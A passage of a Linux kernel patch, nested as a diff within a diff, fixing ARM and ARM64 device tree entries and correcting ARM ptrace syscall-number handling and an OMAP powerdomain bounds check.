+--- a/arch/arm/boot/dts/stm32mp157c-ev1.dts
++++ b/arch/arm/boot/dts/stm32mp157c-ev1.dts
+@@ -144,7 +144,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts b/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
+index e8d2ec41d5374..cb00ce7cec8b1 100644
+--- a/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
++++ b/arch/arm/boot/dts/stm32mp157c-lxa-mc1.dts
+@@ -112,7 +112,7 @@
+ 	phy-handle = <&ethphy>;
+ 	status = "okay";
+ 
+-	mdio0 {
++	mdio {
+ 		compatible = "snps,dwmac-mdio";
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+diff --git a/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi b/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
+index 2d9461006810c..cf74852514906 100644
+--- a/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp157c-odyssey-som.dtsi
+@@ -62,11 +62,6 @@
+ 			reg = <0x38000000 0x10000>;
+ 			no-map;
+ 		};
+-
+-		gpu_reserved: gpu@d4000000 {
+-			reg = <0xd4000000 0x4000000>;
+-			no-map;
+-		};
+ 	};
+ 
+ 	led {
+@@ -80,11 +75,6 @@
+ 	};
+ };
+ 
+-&gpu {
+-	contiguous-area = <&gpu_reserved>;
+-	status = "okay";
+-};
+-
+ &i2c2 {
+ 	pinctrl-names = "default";
+ 	pinctrl-0 = <&i2c2_pins_a>;
+@@ -240,8 +230,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/stm32mp157c-odyssey.dts b/arch/arm/boot/dts/stm32mp157c-odyssey.dts
+index ed66d25b8bf3d..a8b3f7a547036 100644
+--- a/arch/arm/boot/dts/stm32mp157c-odyssey.dts
++++ b/arch/arm/boot/dts/stm32mp157c-odyssey.dts
+@@ -41,7 +41,7 @@
+ 	assigned-clock-rates = <125000000>; /* Clock PLL4 to 750Mhz in ATF/U-Boot */
+ 	st,eth-clk-sel;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+index d3b85a8764d74..74a11ccc5333f 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcom-som.dtsi
+@@ -80,17 +80,19 @@
+ 	vdda-supply = <&vdda>;
+ 	vref-supply = <&vdda>;
+ 	status = "okay";
++};
+ 
+-	adc1: adc@0 {
+-		st,min-sample-time-nsecs = <5000>;
+-		st,adc-channels = <0>;
+-		status = "okay";
++&adc1 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
+ 	};
++};
+ 
+-	adc2: adc@100 {
+-		st,adc-channels = <1>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++&adc2 {
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ };
+ 
+@@ -125,7 +127,7 @@
+ 	max-speed = <100>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+@@ -414,8 +416,8 @@
+ &m4_rproc {
+ 	memory-region = <&retram>, <&mcuram>, <&mcuram2>, <&vdev0vring0>,
+ 			<&vdev0vring1>, <&vdev0buffer>;
+-	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>;
+-	mbox-names = "vq0", "vq1", "shutdown";
++	mboxes = <&ipcc 0>, <&ipcc 1>, <&ipcc 2>, <&ipcc 3>;
++	mbox-names = "vq0", "vq1", "shutdown", "detach";
+ 	interrupt-parent = <&exti>;
+ 	interrupts = <68 1>;
+ 	status = "okay";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+index f068e4fcc404f..b7ba43865514d 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-avenger96.dtsi
+@@ -112,17 +112,39 @@
+ 	vdda-supply = <&vdda>;
+ 	vref-supply = <&vdda>;
+ 	status = "okay";
++};
+ 
+-	adc1: adc@0 {
+-		st,adc-channels = <0 1 6>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++&adc1 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ 
+-	adc2: adc@100 {
+-		st,adc-channels = <0 1 2>;
+-		st,min-sample-time-nsecs = <5000>;
+-		status = "okay";
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@6 {
++		reg = <6>;
++		st,min-sample-time-ns = <5000>;
++	};
++};
++
++&adc2 {
++	channel@0 {
++		reg = <0>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@1 {
++		reg = <1>;
++		st,min-sample-time-ns = <5000>;
++	};
++
++	channel@2 {
++		reg = <2>;
++		st,min-sample-time-ns = <5000>;
+ 	};
+ };
+ 
+@@ -151,7 +173,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+index bb4ac6c13cbd3..39af79dc654cc 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dhcor-drc-compact.dtsi
+@@ -78,7 +78,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+index fdc48536e97d1..73a6a7b278b90 100644
+--- a/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
++++ b/arch/arm/boot/dts/stm32mp15xx-dkx.dtsi
+@@ -141,7 +141,7 @@
+ 	max-speed = <1000>;
+ 	phy-handle = <&phy0>;
+ 
+-	mdio0 {
++	mdio {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		compatible = "snps,dwmac-mdio";
+diff --git a/arch/arm/include/asm/syscall.h b/arch/arm/include/asm/syscall.h
+index dfeed440254a8..fe4326d938c18 100644
+--- a/arch/arm/include/asm/syscall.h
++++ b/arch/arm/include/asm/syscall.h
+@@ -25,6 +25,9 @@ static inline int syscall_get_nr(struct task_struct *task,
+ 	if (IS_ENABLED(CONFIG_AEABI) && !IS_ENABLED(CONFIG_OABI_COMPAT))
+ 		return task_thread_info(task)->abi_syscall;
+ 
++	if (task_thread_info(task)->abi_syscall == -1)
++		return -1;
++
+ 	return task_thread_info(task)->abi_syscall & __NR_SYSCALL_MASK;
+ }
+ 
+diff --git a/arch/arm/kernel/entry-common.S b/arch/arm/kernel/entry-common.S
+index 405a607b754f4..b413b541c3c71 100644
+--- a/arch/arm/kernel/entry-common.S
++++ b/arch/arm/kernel/entry-common.S
+@@ -103,6 +103,7 @@ slow_work_pending:
+ 	cmp	r0, #0
+ 	beq	no_work_pending
+ 	movlt	scno, #(__NR_restart_syscall - __NR_SYSCALL_BASE)
++	str	scno, [tsk, #TI_ABI_SYSCALL]	@ make sure tracers see update
+ 	ldmia	sp, {r0 - r6}			@ have to reload r0 - r6
+ 	b	local_restart			@ ... and off we go
+ ENDPROC(ret_fast_syscall)
+diff --git a/arch/arm/kernel/ptrace.c b/arch/arm/kernel/ptrace.c
+index bfe88c6e60d58..cef106913ab7b 100644
+--- a/arch/arm/kernel/ptrace.c
++++ b/arch/arm/kernel/ptrace.c
+@@ -785,8 +785,9 @@ long arch_ptrace(struct task_struct *child, long request,
+ 			break;
+ 
+ 		case PTRACE_SET_SYSCALL:
+-			task_thread_info(child)->abi_syscall = data &
+-							__NR_SYSCALL_MASK;
++			if (data != -1)
++				data &= __NR_SYSCALL_MASK;
++			task_thread_info(child)->abi_syscall = data;
+ 			ret = 0;
+ 			break;
+ 
+diff --git a/arch/arm/mach-omap2/powerdomain.c b/arch/arm/mach-omap2/powerdomain.c
+index 2d747f6cffe8e..0eca44fc11926 100644
+--- a/arch/arm/mach-omap2/powerdomain.c
++++ b/arch/arm/mach-omap2/powerdomain.c
+@@ -174,7 +174,7 @@ static int _pwrdm_state_switch(struct powerdomain *pwrdm, int flag)
+ 		break;
+ 	case PWRDM_STATE_PREV:
+ 		prev = pwrdm_read_prev_pwrst(pwrdm);
+-		if (pwrdm->state != prev)
++		if (prev >= 0 && pwrdm->state != prev)
+ 			pwrdm->state_counter[prev]++;
+ 		if (prev == PWRDM_POWER_RET)
+ 			_update_logic_membank_counters(pwrdm);
+diff --git a/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts b/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
+index 7c569695b7052..2b4dbfac84a70 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra210-smaug.dts
+@@ -1312,6 +1312,7 @@
+ 
+ 	uartd: serial@70006300 {
+ 		compatible = "nvidia,tegra30-hsuart";
++		reset-names = "serial";
+ 		status = "okay";
+ 
+ 		bluetooth {
+diff --git a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+index 57ab753288144..f094011be9ed9 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra234-p3737-0000+p3701-0000.dts
+@@ -2004,6 +2004,7 @@
+ 
+ 		serial@3100000 {
+ 			compatible = "nvidia,tegra194-hsuart";
++			reset-names = "serial";
+ 			status = "okay";
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+index e3e90ad92cc59..9650ae70c8723 100644
+--- a/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
++++ b/arch/arm64/boot/dts/qcom/apq8016-sbc.dts
+@@ -289,9 +289,9 @@
+ 		clock-names = "xclk";
+ 		clock-frequency = <23880000>;
+ 
+-		vdddo-supply = <&camera_vdddo_1v8>;
+-		vdda-supply = <&camera_vdda_2v8>;
+-		vddd-supply = <&camera_vddd_1v5>;
++		DOVDD-supply = <&camera_vdddo_1v8>;
++		AVDD-supply = <&camera_vdda_2v8>;
++		DVDD-supply = <&camera_vddd_1v5>;
+ 
+ 		/* No camera mezzanine by default */
+ 		status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts b/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
+index d85e7f7c0835a..75f7b4f35fe82 100644
+--- a/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
++++ b/arch/arm64/boot/dts/qcom/msm8916-longcheer-l8150.dts
+@@ -163,7 +163,7 @@
+ 		pinctrl-0 = <&light_int_default>;
+ 
+ 		vdd-supply = <&pm8916_l17>;
+-		vio-supply = <&pm8916_l6>;
++		vddio-supply = <&pm8916_l6>;
+ 	};
+ 
+ 	gyroscope@68 {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
+index 4e5264f4116a0..3bbafb68ba5c5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
++++ b/arch/arm64/boot/dts/qcom/msm8996-xiaomi-gemini.dts
+@@ -81,7 +81,7 @@
+ 		#size-cells = <0>;
+ 		interrupt-parent = <&tlmm>;
+ 		interrupts = <125 IRQ_TYPE_LEVEL_LOW>;
+-		vdda-supply = <&vreg_l6a_1p8>;
++		vio-supply = <&vreg_l6a_1p8>;
+ 		vdd-supply = <&vdd_3v2_tp>;
+ 		reset-gpios = <&tlmm 89 GPIO_ACTIVE_LOW>;
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 9d6ec59d1cd3a..9de2248a385a5 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1063,7 +1063,7 @@
+ 				reg-names = "dsi_ctrl";
+ 
+ 				interrupt-parent = <&mdss>;
+-				interrupts = <4>;
++				interrupts = <5>;
+ 
+ 				clocks = <&mmcc MDSS_MDP_CLK>,
+ 					 <&mmcc MDSS_BYTE1_CLK>,
+@@ -3292,6 +3292,9 @@
+ 			#size-cells = <1>;
+ 			ranges;
+ 
++			interrupts = <GIC_SPI 352 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "hs_phy_irq";
++
+ 			clocks = <&gcc GCC_PERIPH_NOC_USB20_AHB_CLK>,
+ 				<&gcc GCC_USB20_MASTER_CLK>,
+ 				<&gcc GCC_USB20_MOCK_UTMI_CLK>,
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 29c60bb56ed5f..b00b8164c4aa2 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -2418,10 +2418,10 @@
+ 
+ 			clocks = <&mmcc MNOC_AHB_CLK>,
+ 				 <&mmcc BIMC_SMMU_AHB_CLK>,
+-				 <&rpmcc RPM_SMD_MMAXI_CLK>,
+ 				 <&mmcc BIMC_SMMU_AXI_CLK>;
+-			clock-names = "iface-mm", "iface-smmu",
+-				      "bus-mm", "bus-smmu";
++			clock-names = "iface-mm",
++				      "iface-smmu",
++				      "bus-smmu";
+ 
+ 			#global-interrupts = <0>;
+ 			interrupts =
+@@ -2445,6 +2445,8 @@
+ 				<GIC_SPI 261 IRQ_TYPE_LEVEL_HIGH>,
+ 				<GIC_SPI 262 IRQ_TYPE_LEVEL_HIGH>,
+ 				<GIC_SPI 272 IRQ_TYPE_LEVEL_HIGH>;
++
++			power-domains = <&mmcc BIMC_SMMU_GDSC>;
+ 		};
+ 
+ 		remoteproc_adsp: remoteproc@17300000 {
+diff --git a/arch/arm64/boot/dts/qcom/pm6150l.dtsi b/arch/arm64/boot/dts/qcom/pm6150l.dtsi
+index f02c223ef4485..06d729ff65a9d 100644
+--- a/arch/arm64/boot/dts/qcom/pm6150l.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm6150l.dtsi
+@@ -75,8 +75,9 @@
+ 		pm6150l_wled: leds@d800 {
+ 			compatible = "qcom,pm6150l-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <0x5 0xd8 0x1 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "ovp";
++			interrupts = <0x5 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x5 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			label = "backlight";
+ 
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pm660l.dtsi b/arch/arm64/boot/dts/qcom/pm660l.dtsi
+index 8aa0a5078772b..88606b996d690 100644
+--- a/arch/arm64/boot/dts/qcom/pm660l.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm660l.dtsi
+@@ -74,8 +74,9 @@
+ 		pm660l_wled: leds@d800 {
+ 			compatible = "qcom,pm660l-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "ovp";
++			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x3 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			label = "backlight";
+ 
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pm8350.dtsi b/arch/arm64/boot/dts/qcom/pm8350.dtsi
+index 2dfeb99300d74..9ed9ba23e81e4 100644
+--- a/arch/arm64/boot/dts/qcom/pm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm8350.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pm8350_thermal: pm8350c-thermal {
++		pm8350_thermal: pm8350-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8350_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/pm8350b.dtsi b/arch/arm64/boot/dts/qcom/pm8350b.dtsi
+index f1c7bd9d079c2..05c1058988927 100644
+--- a/arch/arm64/boot/dts/qcom/pm8350b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pm8350b.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pm8350b_thermal: pm8350c-thermal {
++		pm8350b_thermal: pm8350b-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pm8350b_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index 82b60e988d0f5..49902a3e161d9 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -54,8 +54,9 @@
+ 		pmi8994_wled: wled@d800 {
+ 			compatible = "qcom,pmi8994-wled";
+ 			reg = <0xd800>, <0xd900>;
+-			interrupts = <3 0xd8 0x02 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "short";
++			interrupts = <0x3 0xd8 0x1 IRQ_TYPE_EDGE_RISING>,
++				     <0x3 0xd8 0x2 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "ovp", "short";
+ 			qcom,cabc;
+ 			qcom,external-pfet;
+ 			status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/pmk8350.dtsi b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+index f0d256d99e62e..29cfb6fca9bf7 100644
+--- a/arch/arm64/boot/dts/qcom/pmk8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmk8350.dtsi
+@@ -44,7 +44,7 @@
+ 		};
+ 
+ 		pmk8350_adc_tm: adc-tm@3400 {
+-			compatible = "qcom,adc-tm7";
++			compatible = "qcom,spmi-adc-tm5-gen2";
+ 			reg = <0x3400>;
+ 			interrupts = <0x0 0x34 0x0 IRQ_TYPE_EDGE_RISING>;
+ 			#address-cells = <1>;
+diff --git a/arch/arm64/boot/dts/qcom/pmr735b.dtsi b/arch/arm64/boot/dts/qcom/pmr735b.dtsi
+index ec24c4478005a..f7473e2473224 100644
+--- a/arch/arm64/boot/dts/qcom/pmr735b.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmr735b.dtsi
+@@ -8,7 +8,7 @@
+ 
+ / {
+ 	thermal-zones {
+-		pmr735a_thermal: pmr735a-thermal {
++		pmr735b_thermal: pmr735b-thermal {
+ 			polling-delay-passive = <100>;
+ 			polling-delay = <0>;
+ 			thermal-sensors = <&pmr735b_temp_alarm>;
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts b/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
+index 5e30349efd204..38ec8acb7c40d 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-crd.dts
+@@ -57,7 +57,7 @@
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
+ 
+-		gpio = <&pmc8280_1_gpios 1 GPIO_ACTIVE_HIGH>;
++		gpio = <&pmc8280_1_gpios 2 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 
+ 		pinctrl-names = "default";
+@@ -364,7 +364,7 @@
+ 	};
+ 
+ 	misc_3p3_reg_en: misc-3p3-reg-en-state {
+-		pins = "gpio1";
++		pins = "gpio2";
+ 		function = "normal";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+index b2b744bb8a538..49d15432aeabf 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
++++ b/arch/arm64/boot/dts/qcom/sc8280xp-lenovo-thinkpad-x13s.dts
+@@ -347,7 +347,7 @@
+ };
+ 
+ &tlmm {
+-	gpio-reserved-ranges = <70 2>, <74 6>, <83 4>, <125 2>, <128 2>, <154 7>;
++	gpio-reserved-ranges = <70 2>, <74 6>, <125 2>, <128 2>, <154 4>;
+ 
+ 	kybd_default: kybd-default-state {
+ 		disable {
+diff --git a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+index 1afc960bab5c9..405835ad28bcd 100644
+--- a/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
++++ b/arch/arm64/boot/dts/qcom/sc8280xp.dtsi
+@@ -396,6 +396,7 @@
+ 	firmware {
+ 		scm: scm {
+ 			compatible = "qcom,scm-sc8280xp", "qcom,scm";
++			interconnects = <&aggre2_noc MASTER_CRYPTO 0 &mc_virt SLAVE_EBI1 0>;
+ 		};
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+index 51ee42e3c995c..d6918e6d19799 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845-sony-xperia-tama.dtsi
+@@ -14,6 +14,15 @@
+ 	qcom,msm-id = <321 0x20001>; /* SDM845 v2.1 */
+ 	qcom,board-id = <8 0>;
+ 
++	aliases {
++		serial0 = &uart6;
++		serial1 = &uart9;
++	};
++
++	chosen {
++		stdout-path = "serial0:115200n8";
++	};
++
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sdm845.dtsi b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+index b7ba70857d0ad..52c9f5639f8a2 100644
+--- a/arch/arm64/boot/dts/qcom/sdm845.dtsi
++++ b/arch/arm64/boot/dts/qcom/sdm845.dtsi
+@@ -1099,6 +1099,7 @@
+ 			#clock-cells = <1>;
+ 			#reset-cells = <1>;
+ 			#power-domain-cells = <1>;
++			power-domains = <&rpmhpd SDM845_CX>;
+ 		};
+ 
+ 		qfprom@784000 {
+@@ -2520,7 +2521,7 @@
+ 				<0 0>,
+ 				<0 0>,
+ 				<0 0>,
+-				<0 300000000>;
++				<75000000 300000000>;
+ 
+ 			status = "disabled";
+ 		};
+diff --git a/arch/arm64/boot/dts/qcom/sm6350.dtsi b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+index 35f621ef9da54..34c8de4f43fba 100644
+--- a/arch/arm64/boot/dts/qcom/sm6350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm6350.dtsi
+@@ -306,11 +306,6 @@
+ 			no-map;
+ 		};
+ 
+-		pil_gpu_mem: memory@8b715400 {
+-			reg = <0 0x8b715400 0 0x2000>;
+-			no-map;
+-		};
+-
+ 		pil_modem_mem: memory@8b800000 {
+ 			reg = <0 0x8b800000 0 0xf800000>;
+ 			no-map;
+@@ -331,6 +326,11 @@
+ 			no-map;
+ 		};
+ 
++		pil_gpu_mem: memory@f0d00000 {
++			reg = <0 0xf0d00000 0 0x1000>;
++			no-map;
++		};
++
+ 		debug_region: memory@ffb00000 {
+ 			reg = <0 0xffb00000 0 0xc0000>;
+ 			no-map;
+diff --git a/arch/arm64/boot/dts/qcom/sm8150.dtsi b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+index 78ae4b9eaa106..f049fb42e3ca8 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150.dtsi
+@@ -1196,7 +1196,7 @@
+ 				dma-names = "tx", "rx";
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_i2c7_default>;
+-				interrupts = <GIC_SPI 607 IRQ_TYPE_LEVEL_HIGH>;
++				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+ 				#address-cells = <1>;
+ 				#size-cells = <0>;
+ 				status = "disabled";
+diff --git a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
+index 356a81698731a..62590c6bd3067 100644
+--- a/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
++++ b/arch/arm64/boot/dts/qcom/sm8250-sony-xperia-edo-pdx203.dts
+@@ -14,3 +14,236 @@
+ };
+ 
+ /delete-node/ &vreg_l7f_1p8;
++
++&pm8009_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "CAM_PWR_LD_EN",
++			  "WIDEC_PWR_EN",
++			  "NC";
++};
++
++&pm8150_gpios {
++	gpio-line-names = "VOL_DOWN_N", /* GPIO_1 */
++			  "OPTION_2",
++			  "NC",
++			  "PM_SLP_CLK_IN",
++			  "OPTION_1",
++			  "NC",
++			  "NC",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "NC"; /* GPIO_10 */
++};
++
++&pm8150b_gpios {
++	gpio-line-names = "SNAPSHOT_N", /* GPIO_1 */
++			  "FOCUS_N",
++			  "NC",
++			  "NC",
++			  "RF_LCD_ID_EN",
++			  "NC",
++			  "NC",
++			  "LCD_ID",
++			  "NC",
++			  "WLC_EN_N", /* GPIO_10 */
++			  "NC",
++			  "RF_ID";
++};
++
++&pm8150l_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "PM3003A_EN",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "AUX2_THERM",
++			  "BB_HP_EN",
++			  "FP_LDO_EN",
++			  "PMX_RESET_N",
++			  "AUX3_THERM", /* GPIO_10 */
++			  "DTV_PWR_EN",
++			  "PM3003A_MODE";
++};
++
++&tlmm {
++	gpio-line-names = "AP_CTI_IN", /* GPIO_0 */
++			  "MDM2AP_ERR_FATAL",
++			  "AP_CTI_OUT",
++			  "MDM2AP_STATUS",
++			  "NFC_I2C_SDA",
++			  "NFC_I2C_SCL",
++			  "NFC_EN",
++			  "NFC_CLK_REQ",
++			  "NFC_ESE_PWR_REQ",
++			  "DVDT_WRT_DET_AND",
++			  "SPK_AMP_RESET_N", /* GPIO_10 */
++			  "SPK_AMP_INT_N",
++			  "APPS_I2C_1_SDA",
++			  "APPS_I2C_1_SCL",
++			  "NC",
++			  "TX_GTR_THRES_IN",
++			  "HST_BT_UART_CTS",
++			  "HST_BT_UART_RFR",
++			  "HST_BT_UART_TX",
++			  "HST_BT_UART_RX",
++			  "HST_WLAN_EN", /* GPIO_20 */
++			  "HST_BT_EN",
++			  "RGBC_IR_PWR_EN",
++			  "FP_INT_N",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "NFC_ESE_SPI_MISO",
++			  "NFC_ESE_SPI_MOSI",
++			  "NFC_ESE_SPI_SCLK", /* GPIO_30 */
++			  "NFC_ESE_SPI_CS_N",
++			  "WCD_RST_N",
++			  "NC",
++			  "SDM_DEBUG_UART_TX",
++			  "SDM_DEBUG_UART_RX",
++			  "TS_I2C_SDA",
++			  "TS_I2C_SCL",
++			  "TS_INT_N",
++			  "FP_SPI_MISO", /* GPIO_40 */
++			  "FP_SPI_MOSI",
++			  "FP_SPI_SCLK",
++			  "FP_SPI_CS_N",
++			  "APPS_I2C_0_SDA",
++			  "APPS_I2C_0_SCL",
++			  "DISP_ERR_FG",
++			  "UIM2_DETECT_EN",
++			  "NC",
++			  "NC",
++			  "NC", /* GPIO_50 */
++			  "NC",
++			  "MDM_UART_CTS",
++			  "MDM_UART_RFR",
++			  "MDM_UART_TX",
++			  "MDM_UART_RX",
++			  "AP2MDM_STATUS",
++			  "AP2MDM_ERR_FATAL",
++			  "MDM_IPC_HS_UART_TX",
++			  "MDM_IPC_HS_UART_RX",
++			  "NC", /* GPIO_60 */
++			  "NC",
++			  "NC",
